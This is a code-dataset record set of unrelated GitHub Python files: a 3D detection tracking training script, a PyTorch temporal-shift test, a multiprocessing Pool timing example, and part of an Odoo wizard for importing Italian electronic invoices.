print(self.frames_id[-1])\n print(self.frames_det[-1])\n import pdb\n pdb.set_trace()\n\n max_id = np.maximum(np.max(new_id), max_id)\n self.last_id = np.maximum(self.last_id, max_id)\n aligned_ids.append(new_id)\n dets_out[i]['id'] = torch.Tensor(new_id).long()\n # TODO: This only support check for 2 frame case\n if dets_out[1]['id'].size(0) != 0:\n aligned_dets += dets_out[1:]\n self.frames_id += aligned_ids\n self.frames_det += aligned_dets\n return aligned_ids, aligned_dets, frame_start\n\nif __name__ == '__main__':\n fire.Fire()\n", "repo_name": "HYjhkoh/3dobject_detection_temporal", "sub_path": "second/pytorch/train_2st_spatio.py", "file_name": "train_2st_spatio.py", "file_ext": "py", "file_size_in_byte": 48303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.path.append", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 79, "usage_type": "call"}, {"api_name": "utils_tr.data_util.write_kitti_result", "line_number": 92, "usage_type": "call"}, {"api_name": "kitti_devkit.evaluate_tracking.evaluate", "line_number": 100, "usage_type": "call"}, {"api_name": "utils_tr.train_util.AverageMeter", "line_number": 112, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 117, "usage_type": "call"}, {"api_name": "time.time", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 120, "usage_type": "call"}, {"api_name": "time.time", "line_number": 132, "usage_type": "call"}, {"api_name": "time.time", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 178, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 189, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.int32", "line_number": 192, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.uint8", "line_number": 195, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 220, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 220, "usage_type": "attribute"}, {"api_name": "easydict.EasyDict", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "utils_tr.build_util.build_criterion", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 243, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 243, "usage_type": "name"}, {"api_name": "utils_tr.build_util.build_augmentation", "line_number": 246, "usage_type": "call"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 281, "usage_type": "call"}, {"api_name": "utils_tr.train_util.create_logger", "line_number": 282, "usage_type": "call"}, {"api_name": "pprint.pformat", "line_number": 284, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 292, "usage_type": "call"}, {"api_name": "torchplus.train.create_folder", "line_number": 293, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 293, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 295, "usage_type": "call"}, {"api_name": "second.protos.pipeline_pb2.TrainEvalPipelineConfig", "line_number": 300, "usage_type": "call"}, {"api_name": "second.protos.pipeline_pb2", "line_number": 300, "usage_type": "name"}, {"api_name": "google.protobuf.text_format.Merge", "line_number": 303, "usage_type": "call"}, {"api_name": "google.protobuf.text_format", "line_number": 303, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 307, "usage_type": "call"}, {"api_name": "second.builder.voxel_builder.build", "line_number": 316, "usage_type": "call"}, {"api_name": "second.builder.voxel_builder", "line_number": 316, "usage_type": "name"}, {"api_name": "second.pytorch.builder.box_coder_builder.build", "line_number": 321, "usage_type": "call"}, {"api_name": "second.pytorch.builder.box_coder_builder", "line_number": 321, "usage_type": "name"}, {"api_name": "second.builder.target_assigner_builder.build", "line_number": 323, "usage_type": "call"}, {"api_name": "second.builder.target_assigner_builder", "line_number": 323, "usage_type": "name"}, {"api_name": "second.pytorch.builder.second_endtoend_builder_spatio.build", "line_number": 333, "usage_type": "call"}, {"api_name": "second.pytorch.builder.second_endtoend_builder_spatio", "line_number": 333, "usage_type": "name"}, {"api_name": "second.pytorch.builder.second_builder.build", "line_number": 335, "usage_type": "call"}, {"api_name": "second.pytorch.builder.second_builder", "line_number": 335, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 344, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 345, "usage_type": "call"}, {"api_name": "torchplus.train.try_restore_latest_checkpoints", "line_number": 361, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 361, "usage_type": "attribute"}, {"api_name": "second.pytorch.builder.optimizer_builder.build", "line_number": 369, "usage_type": "call"}, {"api_name": "second.pytorch.builder.optimizer_builder", "line_number": 369, "usage_type": "name"}, {"api_name": "torchplus.train.try_restore_latest_checkpoints", "line_number": 373, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 373, "usage_type": "attribute"}, {"api_name": "second.pytorch.builder.lr_scheduler_builder.build", "line_number": 375, "usage_type": "call"}, {"api_name": "second.pytorch.builder.lr_scheduler_builder", "line_number": 375, "usage_type": "name"}, {"api_name": "torch.float16", "line_number": 377, "usage_type": "attribute"}, {"api_name": "torch.float32", "line_number": 379, "usage_type": "attribute"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr_vid_spatio.build", "line_number": 384, "usage_type": "call"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr_vid_spatio", "line_number": 384, "usage_type": "name"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr_vid_spatio.build", "line_number": 394, "usage_type": "call"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr_vid_spatio", "line_number": 394, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 406, "usage_type": "call"}, {"api_name": "time.time", "line_number": 406, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 406, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 407, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 407, "usage_type": "attribute"}, {"api_name": "numpy.random.get_state", "line_number": 408, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 408, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 410, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 410, "usage_type": "attribute"}, {"api_name": "second.data.preprocess_tr_vid_spatio.merge_second_batch_tr_vid_spatio", "line_number": 416, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 419, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 419, "usage_type": "attribute"}, {"api_name": "second.data.preprocess_tr_vid_spatio.merge_second_batch_tr_vid_spatio", "line_number": 425, "usage_type": "name"}, {"api_name": "json.load", "line_number": 437, "usage_type": "call"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 443, "usage_type": "call"}, {"api_name": "time.time", "line_number": 447, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 458, "usage_type": "call"}, {"api_name": "utils_tr.train_util.AverageMeter", "line_number": 460, "usage_type": "call"}, {"api_name": "time.time", "line_number": 514, "usage_type": "call"}, {"api_name": "time.time", "line_number": 515, "usage_type": "call"}, {"api_name": "time.time", "line_number": 579, "usage_type": "call"}, {"api_name": "torchplus.train.save_models", "line_number": 581, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 581, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 583, "usage_type": "call"}, {"api_name": "torchplus.train.save_models", "line_number": 587, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 587, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 599, "usage_type": "call"}, {"api_name": "second.utils.progress_bar.ProgressBar", "line_number": 601, "usage_type": "call"}, {"api_name": "time.time", "line_number": 619, "usage_type": "call"}, {"api_name": "second.data.kitti_common.get_label_annos", "line_number": 626, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 626, "usage_type": "name"}, {"api_name": "second.utils.eval.get_official_eval_result", "line_number": 629, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 648, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 652, "usage_type": "call"}, {"api_name": "torchplus.train.save_models", "line_number": 695, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 695, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 734, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 735, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 736, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 738, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 739, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 742, "usage_type": "call"}, {"api_name": "second.data.kitti_common.kitti_result_line", "line_number": 749, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 749, "usage_type": "name"}, {"api_name": "second.data.kitti_common.get_image_index_str", "line_number": 753, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 753, "usage_type": "name"}, {"api_name": "second.data.kitti_common.get_start_result_anno", "line_number": 781, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 781, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 793, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 794, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 795, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 797, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 798, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 802, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 819, "usage_type": "call"}, {"api_name": "second.data.kitti_common.empty_result_anno", "line_number": 822, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 822, "usage_type": "name"}, {"api_name": "second.data.kitti_common.empty_result_anno", "line_number": 824, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 824, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 827, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 828, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 842, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 850, "usage_type": "call"}, {"api_name": "second.protos.pipeline_pb2.TrainEvalPipelineConfig", "line_number": 851, "usage_type": "call"}, {"api_name": "second.protos.pipeline_pb2", "line_number": 851, "usage_type": "name"}, {"api_name": "google.protobuf.text_format.Merge", "line_number": 854, "usage_type": "call"}, {"api_name": "google.protobuf.text_format", "line_number": 854, "usage_type": "name"}, {"api_name": "second.builder.voxel_builder.build", "line_number": 864, "usage_type": "call"}, {"api_name": "second.builder.voxel_builder", "line_number": 864, "usage_type": "name"}, {"api_name": "second.pytorch.builder.box_coder_builder.build", "line_number": 866, "usage_type": "call"}, {"api_name": "second.pytorch.builder.box_coder_builder", "line_number": 866, "usage_type": "name"}, {"api_name": "second.builder.target_assigner_builder.build", "line_number": 868, "usage_type": "call"}, {"api_name": "second.builder.target_assigner_builder", "line_number": 868, "usage_type": "name"}, {"api_name": "second.pytorch.builder.second_2stage_builder.build", "line_number": 872, "usage_type": "call"}, {"api_name": "second.pytorch.builder.second_2stage_builder", "line_number": 872, "usage_type": "name"}, {"api_name": "second.pytorch.builder.second_endtoend_builder.build", "line_number": 874, "usage_type": "call"}, {"api_name": "second.pytorch.builder.second_endtoend_builder", "line_number": 874, "usage_type": "name"}, {"api_name": "second.pytorch.builder.second_builder.build", "line_number": 876, "usage_type": "call"}, {"api_name": "second.pytorch.builder.second_builder", "line_number": 876, "usage_type": "name"}, {"api_name": "torchplus.train.try_restore_latest_checkpoints", "line_number": 882, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 882, "usage_type": "attribute"}, {"api_name": "torchplus.train.restore", "line_number": 884, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 884, "usage_type": "attribute"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr.build", "line_number": 891, "usage_type": "call"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr", "line_number": 891, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 897, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 897, "usage_type": "attribute"}, {"api_name": "second.data.preprocess.merge_second_batch", "line_number": 903, "usage_type": "name"}, {"api_name": "torch.float16", "line_number": 906, "usage_type": "attribute"}, {"api_name": "torch.float32", "line_number": 908, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 913, "usage_type": "call"}, {"api_name": "second.utils.progress_bar.ProgressBar", "line_number": 917, "usage_type": "call"}, {"api_name": "time.time", "line_number": 921, "usage_type": "call"}, {"api_name": "time.time", "line_number": 924, "usage_type": "call"}, {"api_name": "time.time", "line_number": 925, "usage_type": "call"}, {"api_name": "torch.cuda.synchronize", "line_number": 926, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 926, "usage_type": "attribute"}, {"api_name": "torch.cuda.synchronize", "line_number": 929, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 929, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 930, "usage_type": "call"}, {"api_name": "time.time", "line_number": 942, "usage_type": "call"}, {"api_name": "time.time", "line_number": 944, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 947, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 948, "usage_type": "call"}, {"api_name": "second.data.kitti_common.get_label_annos", "line_number": 955, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 955, "usage_type": "name"}, {"api_name": "second.utils.eval.get_official_eval_result", "line_number": 956, "usage_type": "call"}, {"api_name": "second.utils.eval.get_coco_eval_result", "line_number": 959, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 963, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 966, "usage_type": "call"}, {"api_name": "second.data.kitti_common.annos_to_kitti_label", "line_number": 969, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 969, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 976, "usage_type": "call"}, {"api_name": "second.data.kitti_common.annos_to_kitti_label", "line_number": 980, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 980, "usage_type": "name"}, {"api_name": "second.protos.pipeline_pb2.TrainEvalPipelineConfig", "line_number": 988, "usage_type": "call"}, {"api_name": "second.protos.pipeline_pb2", "line_number": 988, "usage_type": "name"}, {"api_name": "google.protobuf.text_format.Merge", "line_number": 991, "usage_type": "call"}, {"api_name": "google.protobuf.text_format", "line_number": 991, "usage_type": "name"}, {"api_name": "google.protobuf.text_format.MessageToString", "line_number": 992, "usage_type": "call"}, {"api_name": "google.protobuf.text_format", "line_number": 992, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 1032, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1038, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1046, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1056, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1061, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1064, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 1066, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1083, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1083, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1084, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1097, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1097, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1101, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 1123, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 1125, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 1127, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 1168, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1170, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1170, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1171, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1173, "usage_type": "call"}, {"api_name": "fire.Fire", "line_number": 1182, "usage_type": "call"}]}
+{"seq_id": "3065465405", "text": "import torch\n\n\ndef shift(x, n_segment, fold_div=3):\n nt, c, h, w = x.size()\n n_batch = int(nt / n_segment)\n x = x.view(n_batch, n_segment, c, h, w)\n fold = int(c / fold_div)\n left_side = torch.cat((x[:, 1:, :fold], torch.zeros(n_batch, 1, fold, h, w).to(x.device)), dim=1)\n middle_side = torch.cat((torch.zeros(n_batch, 1, fold, h, w).to(x.device), x[:, :n_segment - 1, fold: 2 * fold]),\n dim=1)\n out = torch.cat((left_side, middle_side, x[:, :, 2 * fold:]), dim=2)\n return out.view(nt, c, h, w)\n\n\nif __name__ == '__main__':\n nt = 16\n c = 256\n h = 2\n w = 2\n n_segment = nt\n fold_div = c\n x = torch.arange(nt*c*h*w).float().reshape([nt, c, h, w]);\n out = shift(x, n_segment, fold_div)\n print(x)\n print(out)\n", "repo_name": "itsliupeng/test_torch_cuda", "sub_path": "py/check_temporal_shift.py", "file_name": "check_temporal_shift.py", "file_ext": "py", "file_size_in_byte": 787, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.cat", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "30525171018", "text": "\"\"\"\nParallel processing\nDivide input(Map) and aggregate(Reduce) output\n\"\"\"\nfrom multiprocessing import Pool\nimport time\n# def fun(n):\n# return n*n\n\ndef fun(n):\n sum = 0\n for i in range(n):\n sum += i*i\n return sum\n\nif __name__ == \"__main__\":\n t1 = time.time()\n p = Pool(processes=2)\n # p.map(fun, arr)\n result = p.map(fun, range(10000))\n p.close()\n p.join()\n # result = []\n # for n in arr:\n # result.append(fun(n))\n print(\"Pool took : \", time.time()-t1)\n t2 = time.time()\n for i in range(10000):\n result.append(fun(i))\n print(\"serial processing took: \", time.time()-t2)\n\n #output\n # Pool took : 2.0030744075775146\n # serial processing took: 5.65215802192688\n\n # if take processes=3 in Pool\n # Pool took : 2.8116846084594727\n # serial processing took: 5.556454420089722\n \n\n #if i take processes = 2\n #Pool took : 3.380298376083374\n # serial processing took: 5.721689462661743\n", "repo_name": "doncans/DS", "sub_path": "multiprocessing_pool.py", "file_name": "multiprocessing_pool.py", "file_ext": "py", "file_size_in_byte": 979, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 18, "usage_type": "call"}, {"api_name": "time.time", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 27, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "40676989087", "text": "import logging\nimport re\nfrom datetime import datetime\n\nfrom odoo import api, fields, models, registry\nfrom odoo.exceptions import UserError\nfrom odoo.fields import first\nfrom odoo.osv import expression\nfrom odoo.tools import float_is_zero, frozendict\nfrom odoo.tools.translate import _\n\nfrom odoo.addons.base_iban.models.res_partner_bank import pretty_iban\n\nfrom . import efattura\n\n_logger = logging.getLogger(__name__)\n\nWT_CODES_MAPPING = {\n \"RT01\": \"ritenuta\",\n \"RT02\": \"ritenuta\",\n \"RT03\": \"inps\",\n \"RT04\": \"enasarco\",\n \"RT05\": \"enpam\",\n \"RT06\": \"other\",\n}\n\n\nclass WizardImportFatturapa(models.TransientModel):\n _name = \"wizard.import.fatturapa\"\n _description = \"Import E-bill\"\n\n e_invoice_detail_level = fields.Selection(\n [\n (\"0\", \"Minimum\"),\n (\"1\", \"Tax rate\"),\n (\"2\", \"Maximum\"),\n ],\n string=\"E-bills Detail Level\",\n help=\"Minimum level: Bill is created with no lines; \"\n \"User will have to create them, according to what specified in \"\n \"the electronic bill.\\n\"\n \"Tax rate level: Rate level: an invoice line is created for each \"\n \"rate present in the electronic invoice\\n\"\n \"Maximum level: every line contained in the electronic bill \"\n \"will create a line in the bill.\",\n required=True,\n )\n price_decimal_digits = fields.Integer(\n \"Prices decimal digits\",\n required=True,\n help=\"Decimal digits used in prices computation. This is needed to correctly \"\n \"import e-invoices with many decimal digits, not being forced to \"\n \"increase decimal digits of all your prices. \"\n 'Otherwise, increase \"Product Price\" precision.',\n )\n quantity_decimal_digits = fields.Integer(\n \"Quantities decimal digits\",\n required=True,\n help='Decimal digits used for quantity field. See \"Prices decimal digits\".',\n )\n discount_decimal_digits = fields.Integer(\n \"Discounts decimal digits\",\n required=True,\n help='Decimal digits used for discount field. See \"Prices decimal digits\".',\n )\n\n def _get_selected_model(self):\n context = self.env.context\n model_name = context.get(\"active_model\")\n return model_name\n\n def _get_selected_records(self):\n context = self.env.context\n ids = context.get(\"active_ids\", [])\n model_name = self._get_selected_model()\n attachments = self.env[model_name].browse(ids)\n return attachments\n\n def _check_attachment(self, attachment):\n if attachment.in_invoice_ids:\n raise UserError(_(\"File %s is linked to bills yet.\", attachment.name))\n\n def _extract_supplier(self, fatturapa_attachment):\n return fatturapa_attachment.xml_supplier_id\n\n @api.model\n def default_get(self, fields_list):\n res = super().default_get(fields_list)\n res[\"price_decimal_digits\"] = self.env[\"decimal.precision\"].precision_get(\n \"Product Price\"\n )\n res[\"quantity_decimal_digits\"] = self.env[\"decimal.precision\"].precision_get(\n \"Product Unit of Measure\"\n )\n res[\"discount_decimal_digits\"] = self.env[\"decimal.precision\"].precision_get(\n \"Discount\"\n )\n res[\"e_invoice_detail_level\"] = \"2\"\n\n fatturapa_attachments = self._get_selected_records()\n partners = self.env[\"res.partner\"].browse()\n for fatturapa_attachment in fatturapa_attachments:\n self._check_attachment(fatturapa_attachment)\n partners |= self._extract_supplier(fatturapa_attachment)\n if len(partners) == 1:\n res[\"e_invoice_detail_level\"] = partners[0].e_invoice_detail_level\n if partners[0].e_invoice_price_decimal_digits >= 0:\n res[\"price_decimal_digits\"] = partners[\n 0\n ].e_invoice_price_decimal_digits\n if partners[0].e_invoice_quantity_decimal_digits >= 0:\n res[\"quantity_decimal_digits\"] = partners[\n 0\n ].e_invoice_quantity_decimal_digits\n if partners[0].e_invoice_discount_decimal_digits >= 0:\n res[\"discount_decimal_digits\"] = partners[\n 0\n ].e_invoice_discount_decimal_digits\n return res\n\n def CountryByCode(self, CountryCode):\n country_model = self.env[\"res.country\"]\n return country_model.search([(\"code\", \"=\", CountryCode)])\n\n def ProvinceByCode(self, provinceCode):\n province_model = self.env[\"res.country.state\"]\n return province_model.search(\n [(\"code\", \"=\", provinceCode), (\"country_id.code\", \"=\", \"IT\")]\n )\n\n def reset_inconsistencies(self):\n \"\"\"\n Clean all existing inconsistencies.\n Note that inconsistencies are in all environments.\n \"\"\"\n for env in self.env.all.envs:\n env_context = dict(env.context)\n env_context.pop(\"inconsistencies\", None)\n env.context = frozendict(env_context)\n\n def get_inconsistencies(self):\n \"\"\"\n Get all existing inconsistencies.\n \"\"\"\n return self.env.context.get(\"inconsistencies\", \"\")\n\n def log_inconsistency(self, message):\n \"\"\"\n Add `message` to existing inconsistencies.\n Note that inconsistencies are in all environments.\n \"\"\"\n inconsistencies = self.get_inconsistencies()\n if message not in inconsistencies:\n if inconsistencies:\n inconsistencies += \"\\n\"\n inconsistencies += message\n # we can't set\n # self = self.with_context(inconsistencies=inconsistencies)\n # because self is a locale variable.\n # Environments are weakly referenced,\n # so they might disappear if they are no more referenced.\n # Save the inconsistencies in all the environments\n # to avoid losing them.\n for env in self.env.all.envs:\n env_context = dict(env.context)\n env_context.setdefault(\"inconsistencies\", inconsistencies)\n env.context = frozendict(env_context)\n\n def check_partner_base_data(self, partner_id, DatiAnagrafici):\n partner = self.env[\"res.partner\"].browse(partner_id)\n if (\n DatiAnagrafici.Anagrafica.Denominazione\n and partner.name != DatiAnagrafici.Anagrafica.Denominazione\n ):\n self.log_inconsistency(\n _(\n \"Company Name field contains '%(name)s'.\"\n \" Your System contains '%(partner)s'\"\n )\n % {\n \"name\": DatiAnagrafici.Anagrafica.Denominazione,\n \"partner\": partner.name,\n }\n )\n if (\n DatiAnagrafici.Anagrafica.Nome\n and partner.firstname != DatiAnagrafici.Anagrafica.Nome\n ):\n self.log_inconsistency(\n _(\n \"Name field contains '%(name)s'.\"\n \" Your System contains '%(firstname)s'\"\n )\n % {\n \"name\": DatiAnagrafici.Anagrafica.Nome,\n \"firstname\": partner.firstname,\n }\n )\n if (\n DatiAnagrafici.Anagrafica.Cognome\n and partner.lastname != DatiAnagrafici.Anagrafica.Cognome\n ):\n self.log_inconsistency(\n _(\n \"Surname field contains '%(surname)s'.\"\n \" Your System contains '%(lastname)s'\"\n )\n % {\n \"surname\": DatiAnagrafici.Anagrafica.Cognome,\n \"lastname\": partner.lastname,\n }\n )\n\n def getPartnerBase(self, DatiAnagrafici): # noqa: C901\n if not DatiAnagrafici:\n return False\n partner_model = self.env[\"res.partner\"]\n cf = DatiAnagrafici.CodiceFiscale or False\n vat = False\n if DatiAnagrafici.IdFiscaleIVA:\n id_paese = DatiAnagrafici.IdFiscaleIVA.IdPaese.upper()\n id_codice = re.sub(r\"\\W+\", \"\", DatiAnagrafici.IdFiscaleIVA.IdCodice).upper()\n # Format Italian VAT ID to always have 11 char\n # to avoid validation error when creating the given partner\n if id_paese == \"IT\" and not id_codice.startswith(\"IT\"):\n vat = \"IT{}\".format(id_codice.rjust(11, \"0\")[:11])\n # XXX maybe San Marino needs special formatting too?\n else:\n vat = id_codice\n partners = partner_model\n res_partner_rule = self.sudo().env.ref(\n \"base.res_partner_rule\", raise_if_not_found=False\n )\n if vat:\n domain = [(\"vat\", \"=\", vat)]\n if (\n self.env.context.get(\"from_attachment\")\n and res_partner_rule\n and res_partner_rule.active\n ):\n att = self.env.context.get(\"from_attachment\")\n domain.extend(\n [\n \"|\",\n (\"company_id\", \"child_of\", att.company_id.id),\n (\"company_id\", \"=\", False),\n ]\n )\n partners = partner_model.search(domain)\n if not partners and cf:\n domain = [(\"fiscalcode\", \"=\", cf)]\n if (\n self.env.context.get(\"from_attachment\")\n and res_partner_rule\n and res_partner_rule.active\n ):\n att = self.env.context.get(\"from_attachment\")\n domain.extend(\n [\n \"|\",\n (\"company_id\", \"child_of\", att.company_id.id),\n (\"company_id\", \"=\", False),\n ]\n )\n partners = partner_model.search(domain)\n commercial_partner_id = False\n if len(partners) > 1:\n for partner in partners:\n if (\n commercial_partner_id\n and partner.commercial_partner_id.id != commercial_partner_id\n ):\n self.log_inconsistency(\n _(\n \"Two distinct partners with \"\n \"VAT number %(vat)s or Fiscal Code %(fiscalcode)s already \"\n \"present in db.\"\n )\n % {\"vat\": vat, \"fiscalcode\": cf}\n )\n return False\n commercial_partner_id = partner.commercial_partner_id.id\n if partners:\n if not commercial_partner_id:\n commercial_partner_id = partners[0].commercial_partner_id.id\n self.check_partner_base_data(commercial_partner_id, DatiAnagrafici)\n return commercial_partner_id\n else:\n # partner to be created\n country_id = False\n if DatiAnagrafici.IdFiscaleIVA:\n CountryCode = DatiAnagrafici.IdFiscaleIVA.IdPaese\n countries = self.CountryByCode(CountryCode)\n if countries:\n country_id = countries[0].id\n else:\n raise UserError(\n _(\"Country Code %s not found in system.\") % CountryCode\n )\n vals = {\n \"vat\": vat,\n \"fiscalcode\": cf,\n \"is_company\": (\n DatiAnagrafici.Anagrafica.Denominazione and True or False\n ),\n \"eori_code\": DatiAnagrafici.Anagrafica.CodEORI or \"\",\n \"country_id\": country_id,\n }\n if DatiAnagrafici.Anagrafica.Nome:\n vals[\"firstname\"] = DatiAnagrafici.Anagrafica.Nome\n if DatiAnagrafici.Anagrafica.Cognome:\n vals[\"lastname\"] = DatiAnagrafici.Anagrafica.Cognome\n if DatiAnagrafici.Anagrafica.Denominazione:\n vals[\"name\"] = DatiAnagrafici.Anagrafica.Denominazione\n\n return partner_model.create(vals).id\n\n def getCedPrest(self, cedPrest):\n partner_model = self.env[\"res.partner\"]\n # Assume that any non-IT VAT coming from SdI is correct\n partner_id = self.with_context(\n fatturapa_in_skip_no_it_vat_check=True,\n ).getPartnerBase(cedPrest.DatiAnagrafici)\n no_contact_update = False\n if partner_id:\n no_contact_update = partner_model.browse(\n partner_id\n ).electronic_invoice_no_contact_update\n fiscalPosModel = self.env[\"fatturapa.fiscal_position\"]\n if partner_id and not no_contact_update:\n partner_company_id = partner_model.browse(partner_id).company_id.id\n vals = {\n \"street\": \" \".join(\n map(\n str,\n filter(\n None, (cedPrest.Sede.Indirizzo, cedPrest.Sede.NumeroCivico)\n ),\n )\n ),\n \"zip\": cedPrest.Sede.CAP,\n \"city\": cedPrest.Sede.Comune,\n \"register\": cedPrest.DatiAnagrafici.AlboProfessionale or \"\",\n }\n if cedPrest.DatiAnagrafici.ProvinciaAlbo:\n ProvinciaAlbo = cedPrest.DatiAnagrafici.ProvinciaAlbo\n prov = self.ProvinceByCode(ProvinciaAlbo)\n if not prov:\n 